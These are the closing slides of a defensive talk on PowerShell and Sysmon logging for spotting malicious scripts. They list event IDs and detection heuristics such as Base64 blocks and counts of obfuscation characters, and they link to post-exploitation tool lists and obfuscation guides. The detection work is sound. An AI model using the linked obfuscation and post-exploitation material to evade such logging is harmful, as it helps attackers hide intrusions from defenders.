    PowerShell v5 &v6 • 4100 – Executing Pipeline - WARNING • 4104 – Execute a Remote Command – WARNING and Verbose • No Obfuscation here, stripped out as it is executed, so you get clean code • That big Base64 blob… now it is readable MalwareArchaeology.com
  • 61.
    PowerShell v5 &v6 Event IDs - 4100 and/or 4104 • PS Web Call • PS Suspicious Commands (buzzwords) • PS Count Obfuscation Chars (‘ + $ % ;) • PS ScriptBlock by size (> 1000) • PS Base64 blocks • PS WARNINGS MalwareArchaeology.com
  • 62.
    Sysinternals Sysmon Service •You can catch Not-PowerShell PowerShell execution • Event ID 7 – Module loads – Look for Process that is calling System.Management.* DLLs • And all the other cool stuff Sysmon collects MalwareArchaeology.com
  • 63.
    Summary • Enable PowerShelllogging ! – Use the Cheat Sheets • LOG-MD will check your system and report – Use it to evaluate malware too • Create Reports and Alerts for the items discussed • Maybe add Sysmon on a few systems for ID 7 • Use the “Windows Splunk Logging Cheat Sheet” for some examples of what was discussed • Send us your improvements and tweaks !!!! • But START LOGGING POWERSHELL !!!! MalwareArchaeology.com
  • 64.
    Shout Out • Thisis one DAMN GOOD Report • I use it in my Malicious Discovery Training • Palo Alto Networks – “Pulling Back the Curtains on EncodedCommand PowerShell Attacks” • https://researchcenter.paloaltonetworks.com/2017/03/unit42-pulling-back-the- curtains-on-encodedcommand-powershell-attacks/ • GREAT analysis on the Fu the bad guys use that will help you craft your queries and alerts • Actual spelling of the pwnage, etc. MalwareArchaeology.com
  • 65.
    Resources • https://www.invincea.com/2017/03/powershell-exploit-analyzed-line-by-line/ List ofTools • https://github.com/emilyanncr/Windows-Post-Exploitation Obfuscation • http://www.danielbohannon.com/blog-1/2017/12/2/the-invoke-obfuscation- usage-guide • http://www.danielbohannon.com/blog-1/2017/12/2/the-invoke-obfuscation- usage-guide-part-2 • https://github.com/danielbohannon/Revoke-Obfuscation • https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/revoke- obfuscation-report.pdf • https://www.fireeye.com/blog/threat-research/2017/06/obfuscation-in-the- wild.html Metasploit Check Logging module • https://github.com/darkoperator/Meterpreter-Scripts/tree/master/scripts MalwareArchaeology.com
  • 66.
    Resources LOG-MD.COM • Websites – Log-MD.comThe tool • The “Windows PowerShell Logging Cheat Sheet(s)” • All the other Cheat Sheets too – MalwareArchaeology.com
  • 67.
    Questions? LOG-MD.COM You can findus at: • Log-MD.com • @HackerHurricane • MalwareArchaeology.com • HackerHurricane.com (blog)